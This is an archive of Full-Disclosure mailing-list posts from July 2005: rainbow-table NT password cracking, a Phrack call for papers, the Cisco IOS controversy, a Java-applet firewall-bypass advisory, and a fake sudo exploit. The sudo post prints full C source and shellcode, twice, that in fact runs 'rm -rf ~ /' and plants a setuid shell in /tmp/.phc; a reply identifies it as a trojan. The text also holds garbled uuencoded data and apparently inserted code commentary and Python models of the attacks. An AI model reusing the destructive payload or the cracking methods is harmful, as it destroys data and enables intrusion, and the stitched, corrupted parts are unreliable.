Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread X u r r o n
I used http://www.loginrecovery.net to get my lost passwd; passwd resetting is no problem, but I wanted to recover it. That's a pay service, but if you can wait for days they give out your recovered passwd for free. They guessed my alphanumeric passwd in around 5 min.

On 7/31/05, Ken <[EMAIL PROTECTED]> wrote:
> http://rainbowtables.shmoo.com
>
> -Ken
>
> On Jul 30, 2005, at 3:21 PM, Clement Dupuis wrote:
>
> > Pre computed tables are the way to go.
> >
> > Considering the time it takes to compute them, you may as well buy them.
> >
> > www.rainbowtables.net is a good place amongst others to get them. Their key
> > difference is the variety they have and they keep expanding.
> >
> > Clement

-- 
Muhammad Shahid
Electrical Engineer
X4ce.net Network Administrator
UCET, BZU, Multan.
E-Mail: [EMAIL PROTECTED]
Mobile: +92(300)6326611
Web: http://www.x4ce.net
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread Ken

http://rainbowtables.shmoo.com

-Ken

On Jul 30, 2005, at 3:21 PM, Clement Dupuis wrote:


Precomputed tables are the way to go.

Considering the time it takes to compute them, you may as well buy
them.

www.rainbowtables.net is a good place amongst others to get them.  Their key
difference is the variety they have and they keep expanding.

Clement







[Full-disclosure] Did you miss us yet?

2005-07-30 Thread Phrack Staff
-- 
 ... Phrack is dead. Long Live Phrack.
[-]=[-]

 +++
   =: P H R A C K - R E B O R N :=
 +++

   ... Phrack is dead. Long Live Phrack. 


   CALL FOR PAPERS * CALL FOR PAPERS * CALL FOR PAPERS

--
Deadline: 15 October 2005 at 11:59pm
Submissions: [EMAIL PROTECTED]
--

   The New Phrackstaff are pleased to bring you the third new
   release of PHRACK.

   As originally stated, Phrack strayed from its original purpose
   nearly 62 issues ago. Because of the irresponsible use of the
   Phrack forum, the commercialisation of hacking has been allowed
   to occur -- nay -- encouraged. The old Phrack has been a long time
   in dying. The past few issues have been coughing up blood (this
   could have been due to a severe case of industry rape). But now
   that death has come to the old Phrack, like Gene Gray, Phrack
   is reborn.

   Submissions should _NOT_ disclose new exploit methods, new backdooring
   methods, or any other information that may be used by the information
   security extortion industry to further increase their profit margins.

   Some article ideas:
 - White-hat 12 Step Program
aka. "OMFG I'm a white-hat, How do I Stop?"
 - B4 They were famous.
aka  "Profiles of White-hats they would like to forget."
 - HoneyNet Project: Be Your Enemy
 - Saved by Project Mayhem
 - Setting up your own "I'm a White-hat get me out of here" program.

   As a special treat to our readers, this CFP includes a sample
   of the material we look forward to bringing you, our new Phrack
   readership in the future. 

   

|=---=[ C O N T A C T   P H R A C K   M A G A Z I N E ]=-=|

Editors   : [EMAIL PROTECTED]
Submissions   : [EMAIL PROTECTED]
Commentary: [EMAIL PROTECTED]
Phrack World News : [EMAIL PROTECTED]
(ChiX|H4X)0r Porn : [EMAIL PROTECTED] -- We're open minded.

  ...
   #,..P
hr,  . ..   .Ac
'K#ph,   ..  .   .rAcK'
 #ph'Rac,.   ..K#P'Hra
  Ck'   #PHr  ...  .aCk'  #Ph
   rA,'cK#, .pHr'.AC
   'K#   'Phr,   .aCk'   #P'
  ...   rAc ' .K.#P Hra   ...
 .   cK#   .pHR  .a,   cK#   .
 . .. pH,   .rAc'  .  'k#P.HR. ..
 ..  .'Ac .K#' . 'PHr. ''..  .
 .   . aCk '   .'#PH,.   .
  ...  .rA.'cK'... '#PH,  ...
.rAc'k#, . .PH'rAc,
 .K#P'   'Hr   .   aC'   'k#P,
  .hRa'   cK#  .  pHr   'aCk,
   .#Ph' rAc __'K#P,
.HRACK#PHRACK#PHRACK#PHRACK#PHRACK#'.PH RAC#PHRACK#PHRACK#PHRa.
... cK'
 #Pr   aCk
  #Ph rAc
   K#,   .Ph
   'RA   CK'
#P. .hR
 aC.K#
  PhR
   A


   .
   Or contact us via seance




|=--=[ S A M P L E   A R T I C L E ]=--=| 


With the recent trend of everyone writing a book, the phrack staff have
taken a break from our usual research to give it a try. For your reading
enjoyment, we give you a sample chapter from our upcoming book, "Know
your enemy: The Security Industry". 

The first chapter is titled "The Art of Being Pwnd." I'm not sure I
like the title, but the rest of the staff tell me it fits. Give it a
read, and let us know what you think.


-
Chapter 1: 

The Art of Being Pwnd


If you don't like your job you don't strike. 
You just go in every day and do it really 
half-assed. Thats the American way.
-- Homer (Simpson)


It was another uneventful 2600 meeting for C1tiZ3n, the New-York kids
were bragging about their latest 'big' hack and passing around the new
Mitnick book, "The Art of Intrusion", while trying to avoid the advances
of Emanuel in his halter top purchased at CCC. For C1tiZ3n this was
particularly a concern, as he was unusually fit for a hacker, probably
lucky genetics. When things would get desperate, C1tiZ3n had taken to
pretending to listen to rebel, just

[Full-disclosure] RE: Cisco IOS Shellcode Presentation

2005-07-30 Thread Neville Aga
The presentation Larry posted is not the same presentation Mike Lynn
delivered at Blackhat. I was there and saw his presentation. It was
one of the best presentations I have ever seen. It was delivered with
intelligence and passion and care. I wonder whether, when my time comes
for something like that, I will have the fortitude to do what I believe
to be right under threats from a corporation as powerful as Cisco.  What
has been posted is irresponsible.

Michael was responsible with his information. The slides that are
posted here and are now going to float around the internet forever
have full text in the slides titled finding malloc() and finding
CreateThread(), complete with the critical offsets needed to reproduce
the attack. The slides he presented had all that blacked out. He gave
nothing to a Blackhat attendee to go out and reproduce the attack
themselves. Instead he made a point about Cisco IOS, namely:

1. You get one Cisco BGP internet router, it has a route to all other
routers and therefore a path to the entire network, not one system
(OK, you knew that)

2. Cisco IOS source code has been stolen at least twice. There is no
good reason to steal it other than to attack it. If Mike Lynn can
figure this one attack technique out, how many more attack techniques
can be figured out by people holding source code?

3. During the presentation, Mike Lynn said a substantial amount of his
research in this subject came from English translations of Chinese
hacking web sites. Consider That!!

4. Most importantly, the real threat here is a self replicating worm
that has a destructive payload to modify BGP routes or write back boot
sectors to make thousands of routers simultaneously useless (the
digital Pearl Harbor he alluded to). Mike said that that is not really
feasible today with this particular technique because the way code is
implemented you would need to know the exact IOS version and some
other hardware details for each router, so unless you have a 17MB worm
that has precompiled exploit code for each possible instance, then the
worm scenario is not possible, and a 17MB worm is not practical.

4A. However (consider this one reason why Mike may ultimately be
remembered as a hero) Cisco's roadmap is moving to a new memory
structure where the offsets would be the same for all hardware. That
could make your router worm a real possibility, not with this exploit
(I am sure everyone will patch their routers to prevent this exploit),
but with the next flaw someone else figures out. Do you think Cisco
may reconsider that design after this? I certainly think they will, or
else they should have their collective head examined. Remember, some
Chinese hackers were already thinking down these paths before Mike
was.


In my opinion a real loser in all this is ISS. The strength of any
company is its people. Management should trust and defend their best
and brightest, not sue them and force them to resign. In the case of
illegal activities of course management has no obligation to defend
criminals. However that is not what happened here. Cisco saying this
was illegal did not make it so. The talk was delivered in a
responsible and professional way. ISS did not care to see the details
and the way Mike presented this particular talk, they just caved to
Cisco pressure, co-suing Mike with Cisco to make Mike look like a
rogue and becoming a puppet for a business partner instead of helping
an employee.


Neville


Re: [Full-disclosure] Undisclosed Sudo Vulnerability ?

2005-07-30 Thread Kurt Seifried

This is a trojan that will nuke all the files owned by the user running it.

-Kurt

- Original Message - 
From: "Esler, Joel - Contractor" <[EMAIL PROTECTED]>

To: 
Sent: Saturday, July 30, 2005 12:40 PM
Subject: [Full-disclosure] Undisclosed Sudo Vulnerability ?



About two weeks ago, our proprietary LIDS detected some suspicious shell
activity on an internal .mil machine i am in charged of. Our server runs
latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
Before shutting down the machine and reinstalling it from scratch, we
installed sebek module to monitor all shell activity. Based on the data
we gathered, it seems the attacker gained root privileges using an
undisclosed bug in latest sudo.

$ uname -a
Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 GNU/Linux


$ sudo -V
Sudo version 1.6.8p9

$ ls -al /tmp/.phc
-rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc

Here is an excerpt of a shell session we recorded:

<.>
$ cat >blaat.uue<<'EH'








EH
$ uudecode blaat.uue
$ cat sudoh.c
/*
 *  off by one ebp overwrite in sudo prompt parsing func (bground mode only)
 *
 *  "y0, don't abuse this priv8 exploit to rm boxes. k,thx" - Richard Johnson
 *
 *  gcc -pipe -o sudoh sudoh.c ; ./sudoh
 *
 *  happy deathday route
 *
 */

#include 
#include 
#include 
#include 


#define SUDO_PROMPT "[EMAIL PROTECTED]> \\%"
#define shellcode   esp
#define RETS_NUM    246 /* generic */
#define NOPS_NUM    116 /* generic */


/*
 *  Linux x86 non-interactive exec
 *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
 *
 *  What the bytes actually do: the four "\x68" pushes place a NOT-encoded
 *  string on the stack, the four "\xf7" NOTs decode it in place to
 *  "rm -rf ~ / &", and "\xb0\x0b\xcd\x80" is execve("/bin/sh",
 *  {"/bin/sh", "-c", "rm -rf ~ / &", NULL}, {NULL}). The "cp -p /bin/sh ..."
 *  text at the end lies past the jmp/call targets and is never referenced.
 */

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
   = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
     "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
     "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
     "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
     "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
     "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
     "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
     "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
/* = "\xcc\xeb\xfe"; */



void fill (char *buff, int size, unsigned long val)
{
   unsigned long *ptr = (unsigned long *) buff;

   for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = val;
}


/*
 *  AT&T syntax: "esp" without a leading % is a symbol, not the register,
 *  so this returns the address of the esp[] array above (the shellcode
 *  in .text), not the stack pointer its name suggests.
 */
unsigned long get_sp (void)
{
   __asm__ ("lea esp, %eax");
}


/*
 *  nops_nums and rets_nums are plain char: RETS_NUM (246) arrives as -10,
 *  so alloca() is handed a negative size and rets ends up at or above the
 *  current stack top. fill() then writes 61 copies (244 bytes) of the
 *  shellcode address upward through this frame, saved return address
 *  included; the intended result is that returning from this function
 *  lands in the shellcode, so sudo is never reached.
 */
char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
{
   int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen (shellcode);

   unsigned char *nops = alloca (nops_nums);
   unsigned char *rets = alloca (rets_nums);
   unsigned long ret = get_sp ();
   static char exp_buffer [8192];

   /* make sure sudo isatty() fails */
   close (0); close (1); close (2);

   fill (nops, (unsigned char) nops_nums, 0x90909090);
   fill (rets, (unsigned char) rets_nums, ret);

   /* be nice plz */
   if (size > sizeof (exp_buffer)) {
      fprintf (stderr, "buffer's t00 small..\n");
      return NULL;
   }

   snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
             SUDO_PROMPT, /* evilz prompt */
             nops,
             shellcode,
             rets);

   /* exploit buff */
   return exp_buffer;
}



int main(int argv, char *argc[])
{
   char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);

   /* thanks again T0dd :) */

   execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, "/bin/false", NULL);

   /* ok, shellroot should await you @ "HISTFILE=/dev/null /tmp/.phc -p" */

   return 0;
}

$ gcc -pipe -o sudoh sudoh.c
{standard input}: Assembler messages:
{standard input}:5: Warning: Ignoring changed section attributes for .text
$ ./sudoh
$ cat /bin/cat > blaat.uue; rm blaat.uue
$ cat /bin/cat > sudoh.c; rm sudoh.c
$ cat /bin/cat > sudoh; rm sudoh
$ HISTFILE=/dev/null /tmp/.phc -p
id
uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
<.>


Todd Miller, the maintainer of Sudo has been informed yesterday, and it
is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.


J

Joel Esler, GCIA
[EMAIL PROTECTED]
706-791-7165 DSN: 780-7165






RE: [Full-disclosure] Mike Lynn's controversial CiscoSecurity Presentation

2005-07-30 Thread Fetch, Brandon
I'm kinda looking forward to that offering of a Guinness!

Who'd like to offer me one in DFW, Tx?  I've seen it!

;-)

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of
[EMAIL PROTECTED]
Sent: Friday, July 29, 2005 9:21 PM
To: Russell Smoak
Cc: full-disclosure@lists.grok.org.uk; nanog@merit.edu;
[EMAIL PROTECTED]
Subject: Re: [Full-disclosure]  Mike Lynn's controversial
CiscoSecurity Presentation 


On Fri, 29 Jul 2005 13:11:57 CDT, Russell Smoak said:
> All,
> 
> These recipients received an email from Austin Mckinley as Cisco Systems.
> 
> This messasge was sent in complete error and includes intellectual
> property of ISS and Cisco Systems.  Please delete and do not distrbute
> the information any further.

Unfortunately, there has been a temporal discontinuity between the departure
of the quadrupeds and the closing of the barn doors.

There's only two ways to *effectively* deal with this one:

a) Commence massive neural wipes of anybody who *might* have seen it.

b) Obtain *and* *enforce* a permanent injunction banning anybody who's already
seen it from meeting anybody who hasn't seen it in any establishment that
serves Guinness.

deCSS, anybody? ;)


This message is intended only for the person(s) to which it is addressed 
and may contain privileged, confidential and/or insider information. 
If you have received this communication in error, please notify us 
immediately by replying to the message and deleting it from your computer. 
Any disclosure, copying, distribution, or the taking of any action concerning
the contents of this message and any attachment(s) by anyone other 
than the named recipient(s) is strictly prohibited.



[Full-disclosure] Undisclosed Sudo Vulnerability ?

2005-07-30 Thread Esler, Joel - Contractor
About two weeks ago, our proprietary LIDS detected some suspicious shell
activity on an internal .mil machine i am in charged of. Our server runs
latest up2date Debian GNU/Linux on 2.4.31 x86 with grsec/PaX enabled.
Before shutting down the machine and reinstalling it from scratch, we
installed sebek module to monitor all shell activity. Based on the data
we gathered, it seems the attacker gained root privileges using an
undisclosed bug in latest sudo.

$ uname -a
Linux syslog 2.4.31-grsec #1 SMP Tue Jun 21 09:10:06 EDT 2005 i686 GNU/Linux

$ sudo -V
Sudo version 1.6.8p9

$ ls -al /tmp/.phc
-rwsr-xr-x  1 root root 304873 Jul 05 03:45 /tmp/.phc

Here is an excerpt of a shell session we recorded:

<.>
$ cat >blaat.uue<<'EH'
begin 600 sudoh.c
M+RH*("H@(&]F9B!B>2!O;[EMAIL PROTECTED])P(&]V97)W2!D96%T:&1A
M>2!R;[EMAIL PROTECTED]@[EMAIL 
PROTECTED]"B-I;F-L=61E(#QS=&1I;RYH/@HC:6YC;'5D92`\
M=6YI<[EMAIL PROTECTED]"B-I;F-L=61E(#QS=')I;F[EMAIL 
PROTECTED](&YO;BUI;G1E&5C"B`J("![,"PQ
M+#)](&9D#-E7'@U8EQX,S%<>&,P7'@U,%QX-31<>#5A7'@X,UQX
M96-<>#8T7'@V."(*"0D@(")<>&9F7'AF9EQX9F9<>&9F7'@V.%QX9&9<>&0P
M7'AD9EQX9#E<>#8X7'@X9%QX.3DB"@D)("`B7'AD9EQX.#%<>#8X7'@X9%QX
M.3)<>&1F7'AD,EQX-31<>#5E7'AF-UQX,39<>&8W(@H)"2`@(EQX-39<>#`T
M7'AF-UQX-39<>#`X7'AF-UQX-39<>#!C7'@X,UQX8S1<>##AD7'@W,UQX,#A<>#4V7'@U,UQX-31<>#4Y7'AB,%QX,&)<>&-D7'@X
M,%QX,S$B"@D)("`B7'AC,%QX-#!<>&5B7'AF.5QX93A<>&)D7'AF9EQX9F9<
M>&9F7'@R9EQX-C)<>#8Y(@H)"2`@(EQX-F5<>#)F7'@W,UQX-CA<>#`P7'@R
M9%QX-C-<>#`P(@H)"2`@(F-P("UP("]B:6XO&9E([EMAIL PROTECTED]"@H*=F]I9"!F:6QL("AC:&%R("IB=69F+"!I;G0@F5O
M9B`H=6YS:6=N960@;&]N9RD[('-I>F4@/B`P.R!S:7IE+2TI("IP='(K*R`]
M('9A;#L*?0H*"G5N"(I.PI]"@H*8VAAE]O=VXS
M9"`H8VAAF5O9B`H
M97AP7V)U9F9EF5O9B`H97AP7V)U9F9E'!L;VET([EMAIL 
PROTECTED]&@S,%]I>E]O
M=VXS9"`H3D]04U].54TL(%)%5%-?3E5-+"!S:&5L;&-O9&4I.PH*"2\J('1H
M86YK'!L;VET+"`B+V)I
M;B]F86QS92(L($Y53$PI.PH*("`@("`@("`O*B!O:RP@
#include 
#include 
#include 


#define SUDO_PROMPT "[EMAIL PROTECTED]> \\%"
#define shellcode   esp
#define RETS_NUM246 /* generic */
#define NOPS_NUM116 /* generic */


/*
 *  Linux x86 non-interactive exec
 *  {0,1,2} fds are closed upon execution of shellcode (use "/bin/sh -c")
 */

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
  "cp -p /bin/sh /tmp/.phc; chmod 4755 /tmp/.phc;";
 /* = "\xcc\xeb\xfe"; */



void fill (char *buff, int size, unsigned long val)
{
unsigned long *ptr = (unsigned long *) buff;

for (size /= sizeof (unsigned long); size > 0; size--) *ptr++ = val;
}


unsigned long get_sp (void)
{
__asm__ ("lea esp, %eax");
}


char *th30_iz_own3d (char nops_nums, char rets_nums, char *shellcode)
{
int size = strlen (SUDO_PROMPT) + nops_nums + rets_nums + strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];

/* make sure sudo isatty() fails */
close (0); close (1); close (2);

fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);

/* be nice plz */
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer's t00 small..\n");
return NULL;
}

snprintf (exp_buffer, sizeof (exp_buffer), "%s%s%s%s",
  SUDO_PROMPT, /* evilz prompt */
  nops,
  shellcode,
  rets);

/* exploit buff */
return exp_buffer;
}



int main(int argv, char *argc[])
{
char *exploit = th30_iz_own3d (NOPS_NUM, RETS_NUM, shellcode);

/* thanks again T0dd :) */

execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p", exploit, "/bin/false", NULL);

/* ok, shellroot should await you @ "HISTFILE=/dev/null /tmp/.phc -p" */

return 0;
}

$ gcc -pipe -o sudoh sudoh.c
{standard input}: Assembler messages:
{standard input}:5: Warning: Ignoring changed section attributes for .text
$ ./sudoh
$ cat /bin/cat > blaat.uue; rm blaat.uue
$ cat /bin/cat > sudoh.c; rm sudoh.c
$ cat /bin/cat > sudoh; rm sudoh
$ HISTFILE=/dev/null /tmp/.phc -p
id
uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
<.>


Todd Miller, the maintainer of Sudo has been informed yesterday, and it
is strongly advised to "sudo su -c chmod -s sudo" until a patch is out.


J

Joel Esler, GCIA
[EMAIL PROTECTED]
706-791-7165 DSN: 780-7165

[Full-disclosure] The Java applet sandbox and stateful firewalls

2005-07-30 Thread Florian Weimer
The Java/Firewall vulnerability
===

Current version: 

The Java sandbox for applets and stateful firewalls interact in a
surprising way. As a result, external hosts can initiate TCP
connections to supposedly protected network services.

* Attack Requirements

This is a passive attack. The attacker must lure the victim to a
carefully crafted web page. The victim's web browser must download and
execute the embedded Java applet. The victim's computer must offer
some vulnerable networking service, and a stateful firewall must
prevent access to this service from the Internet.

* Impact

An attacker can gain access to potentially vulnerable network services
which are located behind firewall and/or NAT devices, so that direct
access from the Internet is otherwise impossible.

* Severity

This is a passive vulnerability which can only be used as a stepping
stone for further attacks. As a result, the risk posed by this
vulnerability alone is fairly low.

* Technical Description

The attack is carried out as follows.

   1. The attacker creates a specifically crafted web site.

   2. She lures the victim to visit this web site.

   3. The victim's browser downloads the applet and begins to run it.

   4. The applet initiates a TCP connection back to the originating
      web server, on port 21 (used by FTP, RFC 959). This connection
      is permitted according to the standard Java sandbox model for
      applets.

   5. An FTP server on the same machine that hosts the originating web
      site answers.

   6. The applet continues to pose as an FTP client, logs in and
  issues an FTP PORT command, which prepares an active FTP
  connection. The TCP port specified in the command refers to some
  existing TCP service, such as 445/TCP (SMB over TCP) or 1433/TCP
  (Microsoft SQL Server, MSDE). This port is chosen by the
  attacker.

   7. The firewall between the attacker and the victim recognizes this
  command and prepares to open a second connection for the FTP
  data transfer.

   8. The applet issues an FTP command which requests the data
      transfer, for example a LIST command.

   9. The attacker uses her server to initiate a TCP connection to the
  port indicated in the PORT on the victim host. The firewall
  passes through the connection, assuming that it is a legitimate
  FTP data transfer.

This attack exploits the fact that the Java security model for applets
assumes that arbitrary TCP connections back to the server pose no
risks. However, the presence of stateful firewalls or NAT devices with
heuristic FTP protocol modules between the involved hosts invalidates
this assumption, because TCP connections back to the originating
server do have side effects.

This is not an error in the Java implementation or in the firewall
implementation. Both programs implement their respective
specifications. Even the specifications themselves are not inherently
flawed. Only the combination of these two components creates a
vulnerable configuration. This stresses an important point about
secure systems: Security does not compose, and classic
divide-and-conquer approaches do not necessarily result in complete
systems which are secure.

The attack differs from previous attacks using POST requests to ports
such as 21/FTP. Such attacks could be detected by the firewall and
stopped. In contrast, the Java applet could implement a
fully-compliant FTP client, and the firewall cannot tell whether an
FTP data transfer was initiated by a rogue Java applet or a legitimate
FTP client controlled by the user.
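The nine steps above, and the point that the firewall cannot tell a rogue applet from a legitimate FTP client, as an added worked example (this is not the advisory's proof-of-concept applet or server, and not code from any firewall). It models the three parties in memory in Python: the applet's protocol-compliant control session, the firewall's FTP helper that opens a pinhole when it sees PORT, and the attacker's server connecting to the advertised address. The addresses, class names and the `RestrictedFtpHelper` rules are assumptions for illustration; the restricted variant applies the classic anti-bounce checks (PORT must name the control connection's client, and not a port below 1024, as recommended for servers in RFC 2577), and shows that they stop 445/TCP but not 1433/TCP, since the applet really is the client.

```python
"""In-memory model of the Java-applet / stateful-firewall FTP bounce.

Parties: the applet (victim host) speaking RFC 959 FTP on tcp/21 to the
attacker's server; the firewall's FTP helper watching that control connection;
the attacker's server initiating the "data" connection the helper expects.
"""
import re
from dataclasses import dataclass

# Constructed addresses for the example (not taken from the advisory).
ATTACKER = "203.0.113.10"   # hosts both the web site and the FTP server
VICTIM = "192.168.1.20"     # the applet runs here, behind the firewall

PORT_RE = re.compile(
    r"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$",
    re.IGNORECASE)


def parse_port(line: str):
    """Decode 'PORT h1,h2,h3,h4,p1,p2' (RFC 959) into (ip, port), or None."""
    m = PORT_RE.match(line.strip())
    if not m:
        return None
    nums = [int(g) for g in m.groups()]
    if any(n > 255 for n in nums):
        return None
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def port_command(ip: str, port: int) -> str:
    """Encode the PORT command the applet sends for a chosen target port."""
    return "PORT %s,%d,%d" % (ip.replace(".", ","), port // 256, port % 256)


@dataclass(frozen=True)
class Pinhole:
    src_ip: str    # FTP server: it initiates the active-mode data connection
    dst_ip: str
    dst_port: int


class HeuristicFtpHelper:
    """Stateful helper that trusts every PORT seen on a tcp/21 control connection."""

    def __init__(self, client_ip: str, server_ip: str):
        self.client_ip = client_ip
        self.server_ip = server_ip
        self.pinholes = set()

    def accept_port(self, ip: str, port: int) -> bool:
        return True  # heuristic: it parsed as FTP, so it must be a real transfer

    def on_client_line(self, line: str) -> str:
        target = parse_port(line)
        if target is None:
            return "ignored"          # USER, PASS, LIST, or non-FTP junk
        if not self.accept_port(*target):
            return "rejected"
        self.pinholes.add(Pinhole(self.server_ip, target[0], target[1]))
        return "pinhole"

    def allows(self, src_ip: str, dst_ip: str, dst_port: int) -> bool:
        """Would an inbound SYN src_ip -> dst_ip:dst_port pass the firewall?"""
        return Pinhole(src_ip, dst_ip, dst_port) in self.pinholes


class RestrictedFtpHelper(HeuristicFtpHelper):
    """Adds the usual anti-bounce rules: the data connection must go back to
    the control connection's client, and not to a port below 1024.  The limit
    is visible below: the applet *is* the client, and 1433 is above 1024."""

    def accept_port(self, ip: str, port: int) -> bool:
        return ip == self.client_ip and port >= 1024


def applet_session(target_port: int):
    """Control-channel lines a rogue applet sends (constructed, RFC 959 compliant)."""
    return ["USER anonymous", "PASS applet@", port_command(VICTIM, target_port), "LIST"]


def run_attack(helper: HeuristicFtpHelper, target_port: int) -> bool:
    """Replay the applet's session through the helper, then try the server's
    connection to the victim's service. True means the firewall passed it."""
    for line in applet_session(target_port):
        helper.on_client_line(line)
    return helper.allows(ATTACKER, VICTIM, target_port)


if __name__ == "__main__":
    for name, cls in (("heuristic", HeuristicFtpHelper), ("restricted", RestrictedFtpHelper)):
        for port in (445, 1433):
            passed = run_attack(cls(VICTIM, ATTACKER), port)
            print("%-10s helper: %s -> %s:%d %s" % (name, ATTACKER, VICTIM, port,
                                                    "PASSED" if passed else "blocked"))
```

Running it prints that the heuristic helper passes both 445 and 1433, and the restricted one blocks only 445. That is the advisory's argument in miniature: a port list is a patch for two well-known services, while a helper that does not infer state from client-supplied commands is the fix.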

* Workarounds

* Use clients that do not support active content such as Java
  applets.

* In firewalls, do not use heuristic approaches to stateful
  filtering. Complex protocols should be handled by application
  layer gateways that actually understand the protocols they are
  letting through.

Note that in principle, this vulnerability is not specific to Java or
FTP protocol helpers (see below). A more general approach to eradicate
this problem is therefore necessary.

* Proof of concept

A simple TCP server which emulates FTP and a corresponding Java applet
is provided on the web: 

* Open questions

Some questions need further examination.

* Other implementations of mobile code might be used to carry out
  the attack. For example, it could be possible that Flash objects
  can achieve the same effect.

* The vulnerability is not inherently FTP-related. FTP is used
  here because its active mode is widely used because it is the
  default mode in a widely-used web browser, and stateful filters
  usually implement heuristics to handle such FTP data
  transfers. Other candidate protocols are IRC DCC, Sun and DCE
  RPC, and in particular H.323 and SIP.

* We only tested one firewalling implementation (a custom-compiled
  Linux 2.6 kernel 

RE: [Full-disclosure] Best way to crack NT passwds

2005-07-30 Thread Clement Dupuis
Precomputed tables are the way to go.

Considering the time it takes to compute them, you may as well buy them.

www.rainbowtables.net is a good place amongst others to get them.  Their key
difference is the variety they have and they keep expanding.

Clement
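Clement's recommendation rests on the rainbow-table time/memory trade-off. As an added worked example (not code from this thread, from RainbowCrack or from rainbowtables.net), here is that construction in Python: the offline phase stores only chain endpoints, and the online phase answers a hash lookup with a few chain walks instead of a search of the keyspace. MD5 over a 36-character, 3-character keyspace stands in for the LM/NT hash so it builds in about a second; the charset, chain length and number of chains are arbitrary choices for the demonstration.

```python
"""Toy rainbow table: precompute chains once, then answer hash lookups fast."""
import hashlib
import itertools

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"
PW_LEN = 3            # keyspace: 36**3 = 46656 candidates
CHAIN_LEN = 40        # columns per chain
N_CHAINS = 600        # start points; covers a good part of this tiny keyspace


def H(password: str) -> bytes:
    """Hash under attack; MD5 is a stand-in for the LM/NT hash."""
    return hashlib.md5(password.encode("ascii")).digest()


def reduce_fn(digest: bytes, column: int) -> str:
    """Map a digest back into the keyspace. Mixing in the column index is what
    makes this a rainbow table rather than a plain Hellman table: chains that
    collide in different columns do not merge."""
    n = int.from_bytes(digest, "big") + column
    chars = []
    for _ in range(PW_LEN):
        n, r = divmod(n, len(CHARSET))
        chars.append(CHARSET[r])
    return "".join(chars)


def chain(start: str, upto: int) -> str:
    """Walk a chain: pw_0 = start, pw_{i+1} = R_i(H(pw_i)); return pw_upto."""
    pw = start
    for i in range(upto):
        pw = reduce_fn(H(pw), i)
    return pw


def start_points(n: int):
    """Deterministic start points (constructed; real tables use random ones)."""
    return ["".join(t) for t in itertools.islice(itertools.product(CHARSET, repeat=PW_LEN), n)]


def build_table(starts):
    """Offline phase: store (endpoint -> start points) only, never the middle."""
    table = {}
    for sp in starts:
        table.setdefault(chain(sp, CHAIN_LEN), []).append(sp)
    return table


def lookup(table, target: bytes):
    """Online phase: for each column j the target might occupy, finish the chain
    from there; if the endpoint is known, regenerate that chain and check.
    Cost is O(CHAIN_LEN**2) hash calls, independent of the keyspace size."""
    for j in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_fn(target, j)
        for i in range(j + 1, CHAIN_LEN):
            pw = reduce_fn(H(pw), i)
        for sp in table.get(pw, ()):          # endpoint match: candidate chain(s)
            cand = sp
            for i in range(CHAIN_LEN):        # walk it looking for the target
                if H(cand) == target:
                    return cand
                cand = reduce_fn(H(cand), i)
            # otherwise a false alarm (merged chain); keep trying other columns
    return None


def demo():
    """Build the table, recover a password known to lie in one chain, and show
    that a hash outside the keyspace is simply not found."""
    table = build_table(start_points(N_CHAINS))
    secret = chain(start_points(1)[0], 12)
    return secret, lookup(table, H(secret)), lookup(table, H("not-in-keyspace"))


if __name__ == "__main__":
    secret, found, miss = demo()
    print("secret:", secret, "recovered:", found, "out-of-keyspace:", miss)
```

Two things carry over to the real tables: the lookup only ever finds passwords that some chain happened to pass through (coverage is probabilistic, which is why vendors sell several table sets), and the whole trick depends on the hash being unsalted, which is exactly the LM and NT case the thread is about.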




